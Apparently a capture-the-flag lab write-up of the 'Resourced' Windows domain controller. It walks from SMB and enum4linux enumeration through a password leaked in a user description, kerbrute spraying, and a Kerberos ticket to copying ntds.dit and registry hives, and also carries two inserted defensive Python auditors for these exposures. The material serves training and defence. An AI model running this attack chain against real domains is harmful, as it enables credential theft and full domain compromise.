SMB
Nmap discovered the Windows SMB service (NetBIOS session service and Microsoft-DS) on target ports 139 and 445
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ nmap --script smb-enum-shares -sV -p139,445 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 20:02 CEST
Nmap scan report for 192.168.169.175
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.14 seconds
Share mapping failed
Null Session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ nxc smb $IP -u '' -p '' --shares --interfaces
SMB 192.168.169.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.169.175 445 RESOURCEDC [+] resourced.local\:
SMB 192.168.169.175 445 RESOURCEDC [-] Error enumerating shares: STATUS_ACCESS_DENIED
The target SMB server does not allow guest access
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ smbclient -L //$IP/
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.169.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The target SMB server accepts an anonymous login, but that session lacks the privileges needed to list shares.
enum4linux
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ enum4linux -a -r -o -n -A -U $IP
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr 22 20:04:31 2025
=========================================( Target Information )=========================================
Target ........... 192.168.169.175
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on 192.168.169.175 )==========================
[E] Can't find workgroup/domain
==============================( Nbtstat Information for 192.168.169.175 )==============================
Looking up status of 192.168.169.175
No reply from 192.168.169.175
==================================( Session Check on 192.168.169.175 )==================================
[+] Server 192.168.169.175 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.169.175 )===============================
Domain Name: resourced
Domain Sid: S-1-5-21-537427935-490066102-1511301751
[+] Host is part of a domain (not a workgroup)
=================================( OS information on 192.168.169.175 )=================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.169.175 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
======================================( Users on 192.168.169.175 )======================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant Name: (null) Desc: Linear Algebra and crypto god
index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg Name: (null) Desc: Blockchain expert
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson Name: (null) Desc: Networking specialist
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null) Desc: Frontend Developer
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone Name: (null) Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason Name: (null) Desc: Ex IT admin
index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker Name: (null) Desc: Backend Developer
index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson Name: (null) Desc: Database Admin
index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson Name: (null) Desc: Military Vet now cybersecurity specialist
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz Name: (null) Desc: New-hired, reminder: HotelCalifornia194!
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[M.Mason] rid:[0x44f]
user:[K.Keen] rid:[0x450]
user:[L.Livingstone] rid:[0x451]
user:[J.Johnson] rid:[0x452]
user:[V.Ventz] rid:[0x453]
user:[S.Swanson] rid:[0x454]
user:[P.Parker] rid:[0x455]
user:[R.Robinson] rid:[0x456]
user:[D.Durant] rid:[0x457]
user:[G.Goldberg] rid:[0x458]
================================( Share Enumeration on 192.168.169.175 )================================
do_connect: Connection to 192.168.169.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 192.168.169.175
==========================( Password Policy Information for 192.168.169.175 )==========================
[+] Attaching to 192.168.169.175 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:192.168.169.175)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] resourced
[+] Builtin
[+] Password Info for Domain: resourced
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000001
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 1
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Enabled
Minimum Password Length: 7
=====================================( Groups on 192.168.169.175 )=====================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Remote Desktop Users' (RID: 555) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Administrators' (RID: 544) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
[+] Getting domain group memberships:
Group: 'Domain Controllers' (RID: 516) has member: resourced\RESOURCEDC$
Group: 'Group Policy Creator Owners' (RID: 520) has member: resourced\Administrator
Group: 'Enterprise Admins' (RID: 519) has member: resourced\Administrator
Group: 'Domain Admins' (RID: 512) has member: resourced\Administrator
Group: 'Schema Admins' (RID: 518) has member: resourced\Administrator
Group: 'Domain Guests' (RID: 514) has member: resourced\Guest
Group: 'Domain Users' (RID: 513) has member: resourced\Administrator
Group: 'Domain Users' (RID: 513) has member: resourced\krbtgt
Group: 'Domain Users' (RID: 513) has member: resourced\M.Mason
Group: 'Domain Users' (RID: 513) has member: resourced\K.Keen
Group: 'Domain Users' (RID: 513) has member: resourced\L.Livingstone
Group: 'Domain Users' (RID: 513) has member: resourced\J.Johnson
Group: 'Domain Users' (RID: 513) has member: resourced\V.Ventz
Group: 'Domain Users' (RID: 513) has member: resourced\S.Swanson
Group: 'Domain Users' (RID: 513) has member: resourced\P.Parker
Group: 'Domain Users' (RID: 513) has member: resourced\R.Robinson
Group: 'Domain Users' (RID: 513) has member: resourced\D.Durant
Group: 'Domain Users' (RID: 513) has member: resourced\G.Goldberg
=================( Users on 192.168.169.175 via RID cycling (RIDS: 500-550,1000-1050) )=================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================( Getting printer info for 192.168.169.175 )==============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Tue Apr 22 20:05:32 2025
All the domain users and groups have been enumerated
CLEARTEXT Credential
Interestingly, it revealed what appears to be a cleartext credential for the V.Ventz user in the Description field.
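The Description-field leak above is the kind of thing a defender can hunt for before an attacker does. The following is an added example (not part of the original write-up and not one of the tools it uses) that parses lines in the enum4linux "Users" output format and flags descriptions that carry a password hint keyword, a password-looking token, or both. The sample input is built from the page's own enum4linux lines plus three constructed accounts (svc_backup, J.Jones, T.Test) that are assumptions added to exercise each severity level; the keyword list and the token heuristic are my own choices, not a standard.

```python
import re
from dataclasses import dataclass

# Constructed sample: the first three lines are taken from the page's enum4linux
# output, the last three accounts are made up to exercise every severity level.
SAMPLE_ENUM4LINUX_USERS = """\
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz Name: (null) Desc: New-hired, reminder: HotelCalifornia194!
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null) Desc: Frontend Developer
index: 0xf99 RID: 0x459 acb: 0x00020010 Account: svc_backup Name: (null) Desc: backup svc, pwd=Summer2024
index: 0xf9a RID: 0x45a acb: 0x00020010 Account: J.Jones Name: (null) Desc: Ext 4421 badge B7x!qq93
index: 0xf9b RID: 0x45b acb: 0x00020010 Account: T.Test Name: (null) Desc: Password reset policy owner
"""

# Words that often sit next to a stored secret (heuristic list, my own choice).
KEYWORD_RE = re.compile(
    r"\b(pass(?:word|wd)?|pwd|pw|reminder|cred(?:ential)?s?|secret|pin|login)\b",
    re.IGNORECASE,
)
# enum4linux prints one "index: ... Account: X Name: Y Desc: Z" line per user.
USER_LINE_RE = re.compile(
    r"Account:\s*(?P<account>\S+)\s+Name:\s*(?P<name>.*?)\s+Desc:\s*(?P<desc>.*)$"
)
# Separators that commonly sit between a label and its value ("pwd=...", "reminder: ...").
TOKEN_SPLIT_RE = re.compile(r"[\s=:,;\"']+")


@dataclass
class DescriptionFinding:
    account: str
    severity: str          # "high", "medium" or "low"
    candidates: list       # tokens that look like a password
    description: str


def looks_like_secret(token: str) -> bool:
    """Password-shaped token: 8+ chars, letters and digits, plus punctuation or mixed case."""
    if len(token) < 8:
        return False
    has_alpha = any(c.isalpha() for c in token)
    has_digit = any(c.isdigit() for c in token)
    has_punct = any(not c.isalnum() for c in token)
    has_mixed_case = token.lower() != token and token.upper() != token
    return has_alpha and has_digit and (has_punct or has_mixed_case)


def audit_descriptions(text: str) -> list:
    """Return one finding per account whose Description looks like it stores a secret."""
    findings = []
    for line in text.splitlines():
        match = USER_LINE_RE.search(line)
        if not match:
            continue
        account, desc = match["account"], match["desc"].strip()
        keyword_hit = KEYWORD_RE.search(desc) is not None
        candidates = [t for t in TOKEN_SPLIT_RE.split(desc) if looks_like_secret(t)]
        if keyword_hit and candidates:
            severity = "high"      # a hint word next to a password-shaped token
        elif candidates:
            severity = "medium"    # password-shaped token without a hint word
        elif keyword_hit:
            severity = "low"       # hint word only; usually benign, worth a glance
        else:
            continue
        findings.append(DescriptionFinding(account, severity, candidates, desc))
    return findings


if __name__ == "__main__":
    for f in audit_descriptions(SAMPLE_ENUM4LINUX_USERS):
        print(f"[{f.severity.upper():6}] {f.account}: {f.description!r} -> {f.candidates}")
```

On the defender's side the same logic runs over an export of every user's Description (and, by the same reasoning, the info and comment attributes), since any authenticated domain user, and here even an anonymous session, can read those fields. The token heuristic is deliberately loose, so a build string or ticket number will occasionally be flagged; the point is to get a short review list, not a verdict.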
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ kerbrute passwordspray --dc ResourceDC.resourced.local -d RESOURCED.LOCAL users.txt 'HotelCalifornia194!'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/22/25 - Ronnie Flathers @ropnop
2025/04/22 20:15:24 > Using KDC(s):
2025/04/22 20:15:24 > ResourceDC.resourced.local:88
2025/04/22 20:15:24 > [+] VALID LOGIN: V.Ventz@RESOURCED.LOCAL:HotelCalifornia194!
2025/04/22 20:15:24 > Done! Tested 13 logins (1 successes) in 0.122 seconds
Validated
The password indeed belongs to the V.Ventz user
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getTGT RESOURCED.LOCAL/v.ventz@ResourceDC.resourced.local -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: HotelCalifornia194!
[*] Saving ticket in v.ventz@ResourceDC.resourced.local.ccache
TGT generated for the v.ventz user
v.ventz Session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=v.ventz@ResourceDC.resourced.local.ccache FindDomainShare RESOURCED.LOCAL/v.ventz@ResourceDC.resourced.local -k -no-pass -dc-ip $IP -check-access -check-admin
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Starting domain share enumeration at 2025-04-22 20:47:37
[*] Connecting to LDAP at RESOURCEDC
[*] LDAP connection successful
[*] Found 1 computers in the domain
[*] Found 6 shares on ResourceDC.resourced.local
[*] Enumeration completed in 0:00:02.022379. Found 6 shares.
Found 6 shares:
----------------------------------------------------------------------------------------------------
Computer Share Type Admin Read Write OS Remark
----------------------------------------------------------------------------------------------------
ResourceDC.resourced.local ADMIN$ Unknown (Hidden) No No No Windows Server 2019 Remote Admin
ResourceDC.resourced.local C$ Unknown (Hidden) No No No Windows Server 2019 Default share
ResourceDC.resourced.local IPC$ Disk (Hidden) No Yes No Windows Server 2019 Remote IPC
ResourceDC.resourced.local NETLOGON Unknown No Yes No Windows Server 2019 Logon server share
ResourceDC.resourced.local Password Audit Unknown No Yes No Windows Server 2019
ResourceDC.resourced.local SYSVOL Unknown No Yes No Windows Server 2019 Logon server share
Using the TGT of the v.ventz user, I can enumerate the target's SMB shares with my own tool, FindDomainShare
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ KRB5CCNAME=v.ventz@ResourceDC.resourced.local.ccache impacket-smbclient RESOURCED.LOCAL/v.ventz@ResourceDC.resourced.local -k -no-pass -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Password Audit
SYSVOL
There is a non-default share: Password Audit
Password Audit Share
# use Password Audit
# tree
/Active Directory/ntds.dit
/Active Directory/ntds.jfm
/registry/SECURITY
/registry/SYSTEM
Finished - 6 files and folders
The Password Audit share contains the SYSTEM and SECURITY registry hives as well as the ntds.dit file
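A non-default share readable by an ordinary domain user and holding a copy of ntds.dit together with the SYSTEM hive is, from the defender's side, a full domain compromise waiting to be picked up. The following is an added example (not part of the original write-up and not the author's FindDomainShare tool) that takes share listings, records whether the share was readable with a low-privileged account (the Read column shown by FindDomainShare), and flags both non-default share names and known credential-bearing artifacts. The Password Audit listing mirrors the page's tree output; the SYSVOL and C$ listings are constructed assumptions, and the artifact table is my own.

```python
import posixpath
from dataclasses import dataclass

# File names that carry account secrets; the text explains why each matters.
SENSITIVE_ARTIFACTS = {
    "ntds.dit": "Active Directory database: password hashes of every domain account",
    "ntds.jfm": "ESE flush map for ntds.dit: a raw copy of the AD database was taken",
    "system": "SYSTEM hive: boot key needed to decrypt ntds.dit and SAM secrets",
    "security": "SECURITY hive: LSA secrets and cached domain logons",
    "sam": "SAM hive: local account password hashes",
}

# Shares every domain controller exposes by default; anything else deserves a look.
DEFAULT_DC_SHARES = {"ADMIN$", "C$", "IPC$", "NETLOGON", "SYSVOL"}


@dataclass
class ShareListing:
    share: str
    readable_by_domain_user: bool   # FindDomainShare "Read" column for a plain user
    paths: list                     # paths inside the share, as listed by "tree"


@dataclass
class ShareFinding:
    share: str
    path: str            # None for share-level findings
    severity: str        # "critical", "high" or "info"
    reason: str


# Constructed sample: Password Audit matches the page's tree output; the other two
# entries are assumptions added so that default-share and admin-only cases are covered.
SAMPLE_LISTINGS = [
    ShareListing("Password Audit", True, [
        "/Active Directory/ntds.dit",
        "/Active Directory/ntds.jfm",
        "/registry/SECURITY",
        "/registry/SYSTEM",
    ]),
    ShareListing("SYSVOL", True, ["/resourced.local/scripts/logon.bat"]),
    ShareListing("C$", False, [
        "/Windows/System32/config/SYSTEM",
        "/Windows/NTDS/ntds.dit",
    ]),
]


def classify_path(path: str):
    """Return the reason a file is sensitive, or None. Matches on the base name only."""
    return SENSITIVE_ARTIFACTS.get(posixpath.basename(path).lower())


def audit_shares(listings: list) -> list:
    """Flag non-default shares and sensitive artifacts; severity depends on who can read them."""
    findings = []
    for listing in listings:
        if listing.share.upper() not in DEFAULT_DC_SHARES:
            findings.append(ShareFinding(
                listing.share, None, "info",
                "non-default share: confirm its purpose and review its ACL",
            ))
        for path in listing.paths:
            reason = classify_path(path)
            if reason is None:
                continue
            # Readable by any domain user means the secrets are already exposed;
            # admin-only still means a stale copy of the database is lying around.
            severity = "critical" if listing.readable_by_domain_user else "high"
            findings.append(ShareFinding(listing.share, path, severity, reason))
    return findings


if __name__ == "__main__":
    for f in audit_shares(SAMPLE_LISTINGS):
        where = f"{f.share}{f.path}" if f.path else f.share
        print(f"[{f.severity.upper():8}] {where}: {f.reason}")
```

The matching is on base names only, so a directory that happens to be called SYSTEM or an unrelated sam file will appear in the list; that is acceptable for a review queue, where the cost of a false positive is a minute of someone's time and the cost of a miss is the whole domain. The pairing that matters most is ntds.dit next to a SYSTEM hive: the database alone is encrypted with a key that lives in that hive, so the two together are what turns a file copy into every user's hash.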
┌──(kali㉿kali)-[~/…/PG_PRACTICE/resourced/smb/Password Audit]
└─$ smbget --recursive "smb://ResourceDC.resourced.local/Password Audit/" -U 'RESOURCED.LOCAL/v.ventz'
Password for [RESOURCED.LOCAL\v.ventz]: HotelCalifornia194!
Using domain: RESOURCED.LOCAL, user: v.ventz
Using domain: RESOURCED.LOCAL, user: v.ventz
Using domain: RESOURCED.LOCAL, user: v.ventz
smb://ResourceDC.resourced.local/Password Audit//Active Directory/ntds.dit
Using domain: RESOURCED.LOCAL, user: v.ventz
smb://ResourceDC.resourced.local/Password Audit//Active Directory/ntds.jfm
Using domain: RESOURCED.LOCAL, user: v.ventz
Using domain: RESOURCED.LOCAL, user: v.ventz
smb://ResourceDC.resourced.local/Password Audit//registry/SECURITY
Using domain: RESOURCED.LOCAL, user: v.ventz
smb://ResourceDC.resourced.local/Password Audit//registry/SYSTEM
Downloaded 40.08MB in 24 seconds
After downloading them to Kali, I can use those files to dump the domain's password hashes